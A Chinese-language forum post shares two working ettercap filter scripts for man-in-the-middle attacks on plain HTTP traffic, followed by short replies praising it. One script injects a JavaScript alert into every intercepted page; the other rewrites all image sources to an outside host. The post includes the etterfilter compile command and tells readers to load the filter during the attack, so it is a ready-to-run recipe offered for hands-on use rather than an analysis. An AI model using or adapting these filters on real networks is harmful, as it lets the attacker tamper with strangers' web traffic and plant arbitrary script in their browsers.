找回密码
 注册

QQ登录

只需一步,快速开始

今天看到管理员在微信公众平台发布的关于中间人攻击的手段,让我兴趣极高。自己也根据公众号的教程和自己的实践。动手操作,现在来和大家分享分享吧。

一:js注入弹出文字
我们先写一个脚本文件

if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
# note: replacement string is same length as original string
#msg("zapped Accept-Encoding!\n");
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace("<head>", "<head><script type="text/javascript">alert('hacker!');</script>");
replace("<HEAD>", "<HEAD><script type="text/javascript">alert('hacker!');</script>");
msg("注入成功!!\n");
}

我这里暂且这个文本命名为alert.filter,然后保存。

这个脚本可以替换替换HTML代码中的<head>,在后面加入
<script type=”text/JavaScript”>alert(‘hacker!’);</script>
玩Web的童鞋对这个应该很熟悉,就是在网页上弹出提示框的。要使用这个脚本,还需要使用ettercap自带的编译工具把这个脚本编译成ettercap可以识别的二进制文件。使用如下命令编译:

etterfilter alert.filter -o alert.ef

然后在根据作者视频中的提示,loadafiler即可完成中间人攻击!
二:替换网页图片
if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
# note: replacement string is same length as original string
#msg("zapped Accept-Encoding!\n");
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace("img src=", "img src=http://xxxxx.com/jpe.jpg/&' ");
replace("IMG SRC=", "img src=http://xxxxx.com/jpe.jpg/&' ");
msg("过滤执行.\n");
}

后面的操作不变。载入文件后开始中间人攻击。则可完成对网页图片的替换。
我知道答案 本帖寻求最佳答案回答被采纳后将获得系统奖励10 金币 , 目前已有5人回答

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?注册

x
分享至 : QQ空间
收藏
有没有参加CTF比赛的,一起组队啊!

5 个回复

倒序浏览
成功了吗?我回去了也试试!
回复 使用道具 举报
priess1314 发表于 2018-5-26 13:22
成功了吗?我回去了也试试!

嗯,按照我说的做!
回复 使用道具 举报
嗯,按照我说的做!
回复 使用道具 举报
支持大佬!
回复 使用道具 举报
学习了!感谢分享
回复 使用道具 举报
您需要登录后才可以回帖 登录 | 注册